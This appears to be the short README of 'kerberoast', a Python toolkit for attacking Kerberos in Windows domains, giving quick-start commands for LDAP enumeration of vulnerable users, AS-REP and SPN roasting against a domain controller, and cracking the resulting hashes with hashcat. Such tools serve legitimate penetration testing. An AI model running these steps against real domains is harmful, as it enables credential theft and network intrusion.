kerberoast: Kerberos attack toolkit in Python



For the impatient

IMPORTANT: the accepted target url formats for LDAP and Kerberos are the following
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Steps -with SSPI-: kerberoast auto <DC_ip>

Steps -SSPI not used-:

  1. Look for vulnerable users via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast against users in the ldapenum_asrep_users.txt file
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast against users in the ldapenum_spn_users.txt file
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast and ASPREP roast output with hashcat

Read more…